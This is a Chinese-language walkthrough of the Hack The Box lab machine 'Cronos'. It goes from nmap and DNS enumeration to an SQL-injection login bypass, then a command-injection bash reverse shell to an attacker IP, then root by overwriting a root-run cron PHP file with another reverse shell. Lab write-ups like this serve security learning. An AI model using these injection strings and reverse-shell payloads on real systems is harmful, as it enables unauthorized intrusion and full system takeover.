cronos
IP:10.10.10.13
scan
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 10.10.10.13
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-06 23:19 CST
Nmap scan report for 10.10.10.13
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds
web
80就是一个Apache默认页面,扫路径扫了半天也没有结果。
想想服务器开了53端口DNS服务,应该是有用的,反向解析IP:
┌──(xavier㉿kali)-[~]
└─$ nslookup -ty=ptr 10.10.10.13 10.10.10.13
Server: 10.10.10.13
Address: 10.10.10.13#53
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
绑定Host或设置DNS服务器
┌──(xavier㉿kali)-[~]
└─$ sudo vim /etc/hosts
#文末添加下述内容:
10.10.10.13 ns1.cronos.htb
10.10.10.13 www.cronos.htb
10.10.10.13 cronos.htb
简单分析一下网页,应该是个CMS,附上了GitHub地址:https://github.com/laravel/laravel
再次扫描Web路径:
┌──(xavier㉿kali)-[~]
└─$ dirsearch -u http://cronos.htb -e php,html,txt -x 403 -t 100
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, html, txt | HTTP method: GET | Threads: 100 | Wordlist size: 9901
Output File: /home/xavier/.dirsearch/reports/cronos.htb/_23-04-06_23-50-32.txt
Error Log: /home/xavier/.dirsearch/logs/errors-23-04-06_23-50-32.log
Target: http://cronos.htb/
[23:50:33] Starting:
[23:50:56] 301 - 306B - /css -> http://cronos.htb/css/
[23:50:58] 200 - 0B - /favicon.ico
[23:51:01] 200 - 2KB - /index.php
[23:51:02] 200 - 924B - /js/
[23:51:02] 301 - 305B - /js -> http://cronos.htb/js/
[23:51:10] 200 - 24B - /robots.txt
[23:51:16] 200 - 914B - /web.config
Task Completed
没找到利用的点
又调回去看DNS,枚举一下其他的域名:
┌──(xavier㉿kali)-[~]
└─$ dnsenum --dnsserver 10.10.10.13 cronos.htb
dnsenum VERSION:1.2.6
----- cronos.htb -----
Host's addresses:
__________________
cronos.htb. 604800 IN A 10.10.10.13
Name Servers:
______________
ns1.cronos.htb. 604800 IN A 10.10.10.13
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
unresolvable name: ns1.cronos.htb at /usr/bin/dnsenum line 900.
Trying Zone Transfer for cronos.htb on ns1.cronos.htb ...
AXFR record query failed: no nameservers
Brute forcing with /usr/share/dnsenum/dns.txt:
_______________________________________________
admin.cronos.htb. 604800 IN A 10.10.10.13
又找到个域名:admin.cronos.htb
扫路径
登录暴破,发现存在万能密码登录 admin’or 1=1 --+
进入后台
看看有没有命令注入:
nc 反弹shell,payload:
command=/bin/bash+-c+"/bin/bash+-i+>%26+/dev/tcp/10.10.14.18/8888+0>%261"&host=
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.13] 42952
bash: cannot set terminal process group (1337): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$
root
信息搜集,找到计划任务:
www-data@cronos:/var/www/laravel$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
注意到会以root权限定期执行/var/www/laravel/artisan
,修改该文件
www-data@cronos:/var/www/laravel$ echo '<?php exec("/bin/bash -c '"'"'bash -i >& /dev/tcp/10.10.14.18/9999 0>&1'"'"'");' > artisan
<& /dev/tcp/10.10.14.18/9999 0>&1'"'"'");' > artisan
www-data@cronos:/var/www/laravel$ cat artisan
cat artisan
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/9999 0>&1'");
www-data@cronos:/var/www/laravel$
另一边nc监听999端口,
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.13] 39564
bash: cannot set terminal process group (5955): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cronos:~# cat /root/root.txt
cat /root/root.txt
708bxxxxxxxxxxx0c3b
root@cronos:~#